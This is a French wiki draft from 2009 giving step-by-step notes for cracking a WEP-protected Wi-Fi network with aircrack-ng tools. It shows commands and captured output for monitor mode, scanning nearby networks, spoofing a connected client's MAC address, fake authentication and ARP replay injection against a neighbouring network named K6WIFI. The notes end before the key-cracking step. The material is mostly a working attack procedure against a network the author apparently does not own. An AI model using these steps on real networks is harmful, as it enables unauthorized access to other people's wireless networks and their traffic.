brouillon_wep
Cracker un reseau WEP
Lien:
Avec un eeePC …
Interface Wifi
Voir les interfaces Wifi disponible:
# airmon-ng Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0)
Demarrer le monitor sur l'interface wifi0
# airmon-ng start wifi0 Interface Chipset Driver wifi0 Atheros madwifi-ngError for wireless request "Set Frequency" (8B04) : SET failed on device ath1 ; No such device. ath1: ERROR while getting interface flags: No such device ath0 Atheros madwifi-ng VAP (parent: wifi0) ath2 Atheros madwifi-ng VAP (parent: wifi0)
Oups: c'est quoi cette erreur ?
Capter les reseaux…
# airodump-ng --write fichier ath2
CH 12 ][ Elapsed: 7 mins ][ 2008-04-20 00:36 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 16:78:DF:XX:XX:7E 38 808 0 0 13 54 WPA2 CCMP PSK <length: 0> 16:78:DF:XX:XX:7D 36 800 0 0 13 54 WPA2 CCMP PSK <length: 0> 16:78:DF:XX:XX:7C 35 792 1 0 13 54 WEP WEP K6WIFI 16:78:DF:XX:XX:7F 36 797 0 0 13 54 WPA2 CCMP PSK <length: 0> 6E:6A:97:ZZ:ZZ:8D 26 848 0 0 13 54 WPA2 CCMP PSK <length: 0> 6E:6A:97:ZZ:ZZ:8C 26 805 0 0 13 54 WPA2 CCMP PSK <length: 0> 6E:6A:97:ZZ:ZZ:8F 28 811 0 0 13 54 WPA TKIP MGT freephonie 6E:6A:97:ZZ:ZZ:8E 28 832 0 0 13 54 WPA2 CCMP PSK <length: 0> BSSID STATION PWR Lost Packets Probes (not associated) 00:03:9D:XX:XX:XX 37 31 784 K6WIFI (not associated) 00:15:AF:XX:XX:XX 0 0 36
On s'interesse au reseau “WEP” et/ou dont la colonne #Data
est non nulle.
On affine l'ecoute sur le reseau faible:
# airodump-ng --write test2 --channel 13 --bssid 16:78:DF:XX:XX:7C ath2
On emprunte la MAC d'une station
et on teste qu'on peut l'emprunter (c'est pour le cas d'un filtrage par IP)
# aireplay-ng -1 0 -e K6WIFI -a 16:78:DF:XX:XX:7C -h 00:03:9D:XX:XX:XX ath2 The interface MAC (06:15:AF:XX:XX:XX) doesn't match the specified MAC (-h). ifconfig ath2 hw ether 00:03:9D:XX:XX:XX 01:05:12 Waiting for beacon frame (BSSID: 16:78:DF:XX:XX:7C) 01:05:12 Sending Authentication Request 01:05:12 Authentication successful 01:05:12 Sending Association Request 01:05:13 Association successful :-)
On simuler un tas de paquet avec la MAC …
Il faut être dans le même repertoire |
Sur une console, on demarre l'ecoute:
# airodump-ng --write test2 --channel 13 --bssid 16:78:DF:XX:XX:7C ath2
Sur l'autre, on existe (__même repertoire!) on existe le réseau:
# aireplay-ng -3 -e K6WIFI -b 16:78:DF:XX:XX:7C -h 00:03:9D:XX:XX:XX ath2
(Notez les petits changement dans les options: -3
et -b
)
brouillon_wep.txt · Dernière modification : 2009/05/15 23:52 de thierry